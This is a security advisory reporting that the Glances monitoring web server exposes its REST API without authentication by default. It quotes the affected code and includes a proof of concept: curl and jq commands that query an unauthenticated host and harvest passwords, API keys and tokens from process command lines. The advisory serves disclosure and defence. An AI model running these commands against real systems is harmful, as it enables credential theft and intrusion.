GHSA-wvxv-4j8q-4wjqHigh

Glances exposes the REST API without authentication

Published
March 16, 2026
Last Modified
June 16, 2026

🔗 CVE IDs covered (1)

📋 Description

Summary

Glances web server runs without authentication by default when started with glances -w, exposing REST API with sensitive system information including process command-lines containing credentials (passwords, API keys, tokens) to any network client.

Details

Root Cause: Authentication is optional and disabled by default. When no password is provided, the API router initializes without authentication dependency, and the server binds to 0.0.0.0 exposing all endpoints.

Affected Code:

  • File: glances/outputs/glances_restful_api.py, lines 259-272
if self.args.password:
    self._password = GlancesPassword(username=args.username, config=config)
    if JWT_AVAILABLE:
        jwt_secret = config.get_value('outputs', 'jwt_secret_key', default=None)
        jwt_expire = config.get_int_value('outputs', 'jwt_expire_minutes', default=60)
        self._jwt_handler = JWTHandler(secret_key=jwt_secret, expire_minutes=jwt_expire)
        logger.info(f"JWT authentication enabled (token expiration: {jwt_expire} minutes)")
    else:
        self._jwt_handler = None
        logger.info("JWT authentication not available (python-jose not installed)")
else:
    self._password = None  # NO AUTHENTICATION BY DEFAULT
    self._jwt_handler = None
  • File: glances/outputs/glances_restful_api.py, lines 477-480
if self.args.password:
    router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)])
else:
    router = APIRouter(prefix=self.url_prefix)  # NO AUTH DEPENDENCY
  • File: glances/outputs/glances_restful_api.py, lines 98-99
self.bind_address = args.bind_address or "0.0.0.0"  # BINDS TO ALL INTERFACES
self.port = args.port or 61208
  • File: glances/plugins/processlist/__init__.py, lines 127-140
enable_stats = [
    'cpu_percent',
    'memory_percent',
    'memory_info',
    'pid',
    'username',
    'cpu_times',
    'num_threads',
    'nice',
    'status',
    'io_counters',
    'cpu_num',
    'cmdline',  # FULL COMMAND LINE EXPOSED, NO SANITIZATION
]

PoC

  1. Start Glances in default web server mode:
glances -w
# Output: Glances Web User Interface started on http://0.0.0.0:61208/
  1. Access API without authentication from any network client:
curl -s http://TARGET:61208/api/4/system | jq .
  1. Extract system information:
curl -s http://TARGET:61208/api/4/all > system_dump.json
  1. Harvest credentials from process list:
curl -s http://TARGET:61208/api/4/processlist | \
  jq -r '.[] | select(.cmdline | tostring | test("password|api-key|token|secret"; "i")) | 
  {pid, username, process: .name, cmdline}'
  1. Example credential exposure:
{
  "pid": 4059,
  "username": "root",
  "process": "python3",
  "cmdline": [
    "python3",
    "-c",
    "import time; time.sleep(3600)",
    "--api-key=sk-super-secret-token-12345",
    "--password=MySecretPassword123",
    "--db-pass=admin123"
  ]
}

Impact

Complete system reconnaissance and credential harvesting from any network client. Exposed endpoints include system info, process lists with full command-line arguments (containing passwords/API keys/tokens), network connections, filesystems, and Docker containers. Enables lateral movement and targeted attacks using stolen credentials.

🎯 Affected products1

  • pip/Glances:< 4.5.2

🔗 References (5)